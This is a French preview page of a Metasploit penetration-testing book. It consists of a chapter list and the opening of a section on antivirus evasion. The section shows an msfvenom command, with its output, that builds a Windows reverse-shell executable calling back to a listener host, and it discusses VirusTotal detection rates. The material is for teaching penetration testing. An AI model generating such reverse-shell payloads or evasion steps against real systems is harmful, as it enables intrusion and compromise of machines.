Titre, auteur...

Qu’est-ce qu’un test d’intrusion ?

Quels sont les différents types de tests d’intrusion ?

Quelles sont les différentes phases d’un test d’intrusion ?

L’histoire de Metasploit

Les différentes versions de Metasploit

Pourquoi ce livre ?

Rappel sur l’éthique des tests

Installation native de Metasploit

Utilisation alternative

Maintenir Metasploit à jour

Créer votre image Docker personnalisée

Installation de Metasploitable

La terminologie

Les invites de commandes

Rappel sur les commandes utiles

L’initialisation de la base

Les espaces de travail

Import et export des données

Les hôtes et les services

Phase de reconnaissance passive

Phase de reconnaissance active

Choix des modules à utiliser

Préparation de la phase d’exploitation

Exploitation de Metasploit par Metasploit

Exploitation de Metasploitable par Metasploit

Exemple d’exploitation d’un Windows

Présentation des sessions

Listing des sessions et interactions

Gestion des sessions

Exploitation massive

Vers Meterpreter et au-delà

Présentation de Meterpreter

Les commandes de base de Meterpreter

Désactivation des logiciels de sécurité

Élévation des privilèges

Migration de processus

Enregistrement des frappes clavier

Accès à d’autres machines du réseau

Les attaques sur les mots de passe

Création de charges malveillantes

Garder un accès aux machines

Suppression des traces

Présentation du Social-Engineering Toolkit

Spear-Phishing Attack Vectors

Website Attack Vectors

Infectious Media Generator

Create a Payload and Listener

Mass Mailer Attack

Arduino-Based Attack Vector

Wireless Access Point Attack Vector

QRCode Generator Attack Vector

Powershell Attack Vectors

Garder des traces

Tunner l’invite de commande Metasploit

Lire la documentation

Introduction `Antivirus:contournement`

La meilleure défense étant bien souvent l’attaque, les équipes de défense font évoluer leurs techniques en prenant en compte celles des attaquants.

C’est pourquoi les payloads générés par le framework Metasploit sont de plus en plus connus et donc de plus en plus détectables par les antivirus ou bien par les IDS/IPS.

Prenons le cas d’un simple payload généré par MSFvenom :

root@kali:/tmp# msfvenom -a x86 --platform windows -p 
windows/shell/reverse_tcp LHOST=192.168.171.152 LPORT=3434  -f exe -o 
/tmp/malicious.exe  
No encoder or badchars specified, outputting raw payload  
Payload size: 341 bytes  
Final size of exe file: 73802 bytes  
Saved as: /tmp/malicious.exe

L’analyse de ce simple payload ne contenant aucun moyen de camouflage peut être réalisée par le site VirusTotal (https://www.virustotal.com) : VirusTotal

images/14EP01.png

VirusTotal est un service gratuit qui analyse les fichiers et URL suspects et facilite la détection rapide des virus, vers, trojans et tous types de malwares.

Au sein du VirusTotal, 51 antivirus sur 71 intègrent ce payload au sein de leurs bases antivirales, pouvant ainsi mettre la tentative de compromission de la cible en échec. Néanmoins, MSFvenom intègre des fonctionnalités permettant de tenter de déjouer les protections antivirales.

Découvrez

le livre :

je lis la suite !

Aussi inclus dans nos :

Précédent

Création de charges malveillantes

Suivant

Metasploit